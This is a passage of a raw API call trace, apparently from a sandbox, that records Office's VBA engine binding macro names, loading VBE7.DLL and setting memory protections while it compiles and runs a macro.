szName="gdd_a", lHashVal=0x10e717, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a026a, cbMultiByte=6, lpWideCharStr=0x1dc5d0, cchWideChar=7 | out: lpWideCharStr="gdd_a") returned 6 [0160.804] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="gdd_a", lHashVal=0x10e717, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a026a, cbMultiByte=6, lpWideCharStr=0x1dc5d0, cchWideChar=7 | out: lpWideCharStr="gdd_a") returned 6 [0160.804] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="gdd_a", lHashVal=0x10e717, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a026a, cbMultiByte=6, lpWideCharStr=0x1dc5d0, cchWideChar=7 | out: lpWideCharStr="gdd_a") returned 6 [0160.804] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="gdd_a", lHashVal=0x10e717, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.804] IMalloc:Alloc (This=0x7fefecb5380, cb=0xd) returned 0xa2b6550 [0160.804] _mbscpy_s (in: _Dst=0xa2b6550, _DstSizeInBytes=0x6, _Src=0x63a026a | out: _Dst=0xa2b6550) returned 0x0 [0160.804] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_gdd_a") returned 0x10ab04 [0160.804] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0xd, _Src="_B_var_gdd_a" | out: _Dst="_B_var_gdd_a") returned 0x0 [0160.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=13, lpWideCharStr=0x1dc530, cchWideChar=13 | out: lpWideCharStr="_B_var_gdd_a") returned 13 [0160.805] IUnknown:AddRef (This=0x9ab5f00) returned 0xf [0160.805] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_gdd_a", lHashVal=0x10ab04, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.805] IUnknown:Release (This=0x9ab5f00) returned 0xe [0160.805] IUnknown:AddRef (This=0x9ab4b50) returned 0x22 [0160.805] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_gdd_a", lHashVal=0x10ab04, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.805] IUnknown:Release (This=0x9ab4b50) returned 0x21 [0160.805] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0160.805] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_gdd_a", lHashVal=0x10ab04, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.805] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0160.805] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0160.805] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_gdd_a", lHashVal=0x10ab04, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.805] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0160.805] IUnknown:AddRef (This=0x9ab5f00) returned 0xf [0160.805] IUnknown:Release (This=0x9ab5f00) returned 0xe [0160.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a08b6, cbMultiByte=13, lpWideCharStr=0x1dc590, cchWideChar=14 | out: lpWideCharStr="_B_var_gdd_a") returned 13 [0160.805] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_gdd_a", lHashVal=0x10ab04, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x67005f00720061, ppTypeComp=0x61005f00000000, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x67005f00720061, ppTypeComp=0x61005f00000000, pDummy=0x0) returned 0x0 [0160.805] _mbscpy_s (in: _Dst=0x1dc750, _DstSizeInBytes=0x6, _Src=0x63a026a | out: _Dst=0x1dc750) returned 0x0 [0160.805] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b6550) [0160.805] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc390, pIndex=0x0 | out: ppTLib=0x1dc390*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.805] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc3a0, pDummy=0x0 | out: ppTLibAttr=0x1dc3a0, pDummy=0x0) returned 0x0 [0160.805] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.806] IUnknown:Release (This=0x9ab5f00) returned 0xe [0160.806] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x1dc390, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.806] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc390, pbstrName=0x0, pwOrdinal=0x1dc3b0 | out: pBstrDllName=0x1dc390*=0x0, pbstrName=0x0, pwOrdinal=0x1dc3b0*=0xc620) returned 0x0 [0160.806] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000) returned 0x0 [0160.806] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc390, pIndex=0x0 | out: ppTLib=0x1dc390*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.806] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc3a0, pDummy=0x0 | out: ppTLibAttr=0x1dc3a0, pDummy=0x0) returned 0x0 [0160.806] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.806] IUnknown:Release (This=0x9ab5f00) returned 0xe [0160.806] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dc390, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.806] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc390, pbstrName=0x0, pwOrdinal=0x1dc3b0 | out: pBstrDllName=0x1dc390*=0x0, pbstrName=0x0, pwOrdinal=0x1dc3b0*=0xc620) returned 0x0 [0160.806] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000) returned 0x0 [0160.806] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc390, pIndex=0x0 | out: ppTLib=0x1dc390*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.806] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc3a0, pDummy=0x0 | out: ppTLibAttr=0x1dc3a0, pDummy=0x0) returned 0x0 [0160.806] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.806] IUnknown:Release (This=0x9ab5f00) returned 0xe [0160.806] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dc390, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.807] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc390, pbstrName=0x0, pwOrdinal=0x1dc3b0 | out: pBstrDllName=0x1dc390*=0x0, pbstrName=0x0, pwOrdinal=0x1dc3b0*=0xc620) returned 0x0 [0160.807] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000) returned 0x0 [0160.807] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dbdf0, pIndex=0x0 | out: ppTLib=0x1dbdf0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.807] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dbe00, pDummy=0x0 | out: ppTLibAttr=0x1dbe00, pDummy=0x0) returned 0x0 [0160.807] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.807] IUnknown:Release (This=0x9ab5f00) returned 0xe [0160.807] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dbdf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.807] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dbdf0, pbstrName=0x0, pwOrdinal=0x1dbe10 | out: pBstrDllName=0x1dbdf0*=0x0, pbstrName=0x0, pwOrdinal=0x1dbe10*=0xc080) returned 0x0 [0160.807] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dbdf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dbdf0, pwOrdinal=0x500000000) returned 0x0 [0160.807] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc040, pIndex=0x0 | out: ppTLib=0x1dc040*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.807] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc050, pDummy=0x0 | out: ppTLibAttr=0x1dc050, pDummy=0x0) returned 0x0 [0160.807] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.807] IUnknown:Release (This=0x9ab5f00) returned 0xe [0160.807] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612736, invkind=1, refPtrFlags=0x1dc040, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.807] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc040, pbstrName=0x0, pwOrdinal=0x1dc060 | out: pBstrDllName=0x1dc040*=0x0, pbstrName=0x0, pwOrdinal=0x1dc060*=0xc2d0) returned 0x0 [0160.808] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc040, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc040, pwOrdinal=0x500000000) returned 0x0 [0160.808] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc430, pIndex=0x0 | out: ppTLib=0x1dc430*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.808] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc440, pDummy=0x0 | out: ppTLibAttr=0x1dc440, pDummy=0x0) returned 0x0 [0160.808] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.808] IUnknown:Release (This=0x9ab5f00) returned 0xe [0160.808] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x1dc430, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.808] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc430, pbstrName=0x0, pwOrdinal=0x1dc450 | out: pBstrDllName=0x1dc430*=0x0, pbstrName=0x0, pwOrdinal=0x1dc450*=0xc6c0) returned 0x0 [0160.808] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc430, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc430, pwOrdinal=0x500000000) returned 0x0 [0160.808] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9aa5300, cb=0x3a8) returned 0x9a9d250 [0160.808] IMalloc:Free (This=0x7fefecb5380, pv=0x95a2850) [0160.808] GetCurrentProcess () returned 0xffffffffffffffff [0160.808] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55529, dwSize=0x8) returned 1 [0160.808] GetCurrentProcess () returned 0xffffffffffffffff [0160.808] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55528, dwSize=0x8) returned 1 [0160.808] GetCurrentProcess () returned 0xffffffffffffffff [0160.808] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55259, dwSize=0x8) returned 1 [0160.808] GetCurrentProcess () returned 0xffffffffffffffff [0160.808] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55258, dwSize=0x8) returned 1 [0160.808] GetCurrentProcess () returned 0xffffffffffffffff [0160.808] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55268, dwSize=0x2) returned 1 [0160.808] GetCurrentProcess () returned 0xffffffffffffffff [0160.809] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c552bc, dwSize=0x55) returned 1 [0160.809] VirtualProtect (in: lpAddress=0x9c552bc, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0160.813] GetCurrentProcess () returned 0xffffffffffffffff [0160.813] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c1, dwSize=0x8) returned 1 [0160.813] GetCurrentProcess () returned 0xffffffffffffffff [0160.813] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c0, dwSize=0x8) returned 1 [0160.813] GetCurrentProcess () returned 0xffffffffffffffff [0160.813] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553d0, dwSize=0x2) returned 1 [0160.813] GetCurrentProcess () returned 0xffffffffffffffff [0160.813] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55424, dwSize=0x45) returned 1 [0160.813] VirtualProtect (in: lpAddress=0x9c55424, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0160.814] GetCurrentProcess () returned 0xffffffffffffffff [0160.814] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c554ac, dwSize=0x45) returned 1 [0160.814] VirtualProtect (in: lpAddress=0x9c554ac, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0160.815] GetCurrentProcess () returned 0xffffffffffffffff [0160.815] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55529, dwSize=0x8) returned 1 [0160.815] GetCurrentProcess () returned 0xffffffffffffffff [0160.815] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55528, dwSize=0x8) returned 1 [0160.815] GetCurrentProcess () returned 0xffffffffffffffff [0160.815] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55538, dwSize=0x2) returned 1 [0160.816] GetCurrentProcess () returned 0xffffffffffffffff [0160.816] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54f30, dwSize=0x5d) returned 1 [0160.816] VirtualProtect (in: lpAddress=0x9c54f30, dwSize=0x60, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0160.817] GetCurrentProcess () returned 0xffffffffffffffff [0160.817] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc1, dwSize=0x8) returned 1 [0160.817] GetCurrentProcess () returned 0xffffffffffffffff [0160.817] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fc0, dwSize=0x8) returned 1 [0160.817] GetCurrentProcess () returned 0xffffffffffffffff [0160.817] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54fd0, dwSize=0x2) returned 1 [0160.817] GetCurrentProcess () returned 0xffffffffffffffff [0160.817] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55024, dwSize=0x55) returned 1 [0160.817] VirtualProtect (in: lpAddress=0x9c55024, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0160.818] SetErrorMode (uMode=0x8001) returned 0x8001 [0160.818] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0160.818] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4e20000 [0160.819] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000cce) returned 1 [0160.819] SetErrorMode (uMode=0x8001) returned 0x8001 [0160.820] GetProcAddress (hModule=0x7fee4e20000, lpProcName=0x2c7) returned 0x7fee51a9c24 [0160.820] GetCurrentProcess () returned 0xffffffffffffffff [0160.820] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x95e3718, dwSize=0x63) returned 1 [0160.820] RtlLookupFunctionEntry (in: ControlPc=0x95e3718, ImageBase=0x1dc638, HistoryTable=0x1dc640 | out: ImageBase=0x1dc638, HistoryTable=0x1dc640) returned 0x0 [0160.821] VirtualProtect (in: lpAddress=0x95e3718, dwSize=0x64, flNewProtect=0x40, lpflOldProtect=0x1dc73c | out: lpflOldProtect=0x1dc73c*=0x4) returned 1 [0160.821] RtlAddFunctionTable (FunctionTable=0x95e3788, EntryCount=0x1, BaseAddress=0x95e3600, TargetGp=0x1dc73c) returned 1 [0160.822] SetErrorMode (uMode=0x8001) returned 0x8001 [0160.822] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0160.822] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4e20000 [0160.823] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000ccf) returned 1 [0160.823] SetErrorMode (uMode=0x8001) returned 0x8001 [0160.823] GetProcAddress (hModule=0x7fee4e20000, lpProcName=0x278) returned 0x7fee4f8d6f0 [0160.823] GetCurrentProcess () returned 0xffffffffffffffff [0160.823] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x95e3800, dwSize=0x53) returned 1 [0160.823] RtlLookupFunctionEntry (in: ControlPc=0x95e3800, ImageBase=0x1dc638, HistoryTable=0x1dc640 | out: ImageBase=0x1dc638, HistoryTable=0x1dc640) returned 0x0 [0160.824] VirtualProtect (in: lpAddress=0x95e3800, dwSize=0x54, flNewProtect=0x40, lpflOldProtect=0x1dc73c | out: lpflOldProtect=0x1dc73c*=0x40) returned 1 [0160.825] RtlAddFunctionTable (FunctionTable=0x95e3860, EntryCount=0x1, BaseAddress=0x95e3700, TargetGp=0x1dc73c) returned 1 [0160.825] SetErrorMode (uMode=0x8001) returned 0x8001 [0160.825] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0160.825] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4e20000 [0160.826] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000cd0) returned 1 [0160.826] SetErrorMode (uMode=0x8001) returned 0x8001 [0160.827] GetProcAddress (hModule=0x7fee4e20000, lpProcName=0x204) returned 0x7fee4f8d760 [0160.827] GetCurrentProcess () returned 0xffffffffffffffff [0160.827] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x95e3bb4, dwSize=0x3b) returned 1 [0160.827] RtlLookupFunctionEntry (in: ControlPc=0x95e3bb4, ImageBase=0x1dc638, HistoryTable=0x1dc640 | out: ImageBase=0x1dc638, HistoryTable=0x1dc640) returned 0x0 [0160.827] VirtualProtect (in: lpAddress=0x95e3bb4, dwSize=0x3c, flNewProtect=0x40, lpflOldProtect=0x1dc73c | out: lpflOldProtect=0x1dc73c*=0x40) returned 1 [0160.828] RtlAddFunctionTable (FunctionTable=0x95e3bfc, EntryCount=0x1, BaseAddress=0x95e3b00, TargetGp=0x1dc73c) returned 1 [0160.828] SetErrorMode (uMode=0x8001) returned 0x8001 [0160.828] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0160.828] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4e20000 [0160.829] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10027a1e00000cd1) returned 1 [0160.829] SetErrorMode (uMode=0x8001) returned 0x8001 [0160.829] GetProcAddress (hModule=0x7fee4e20000, lpProcName=0x260) returned 0x7fee4f8ae28 [0160.829] GetCurrentProcess () returned 0xffffffffffffffff [0160.829] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x95e3c74, dwSize=0x43) returned 1 [0160.830] RtlLookupFunctionEntry (in: ControlPc=0x95e3c74, ImageBase=0x1dc638, HistoryTable=0x1dc640 | out: ImageBase=0x1dc638, HistoryTable=0x1dc640) returned 0x0 [0160.830] VirtualProtect (in: lpAddress=0x95e3c74, dwSize=0x44, flNewProtect=0x40, lpflOldProtect=0x1dc73c | out: lpflOldProtect=0x1dc73c*=0x40) returned 1 [0160.830] RtlAddFunctionTable (FunctionTable=0x95e3cc4, EntryCount=0x1, BaseAddress=0x95e3c00, TargetGp=0x1dc73c) returned 1 [0160.831] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0160.831] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0160.831] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0160.831] IUnknown:Release (This=0xa02b108) returned 0x4 [0160.831] IUnknown:AddRef (This=0xa02b160) returned 0x6 [0160.831] IUnknown:QueryInterface (in: This=0xa02b160, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0160.831] IUnknown:QueryInterface (in: This=0xa02b160, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0160.831] IUnknown:Release (This=0xa02b160) returned 0x5 [0160.831] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0160.831] IUnknown:QueryInterface (in: This=0xa02b058, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0160.831] IUnknown:QueryInterface (in: This=0xa02b058, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb60 | out: ppvObject=0x1ddb60*=0x0) returned 0x80004002 [0160.831] IUnknown:Release (This=0xa02b058) returned 0x1 [0160.831] IUnknown:AddRef (This=0xa02b420) returned 0x5 [0160.831] IUnknown:QueryInterface (in: This=0xa02b420, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1ddb68 | out: ppvObject=0x1ddb68*=0x0) returned 0x80004002 [0160.831] IUnknown:QueryInterface (in: This=0xa02b420, 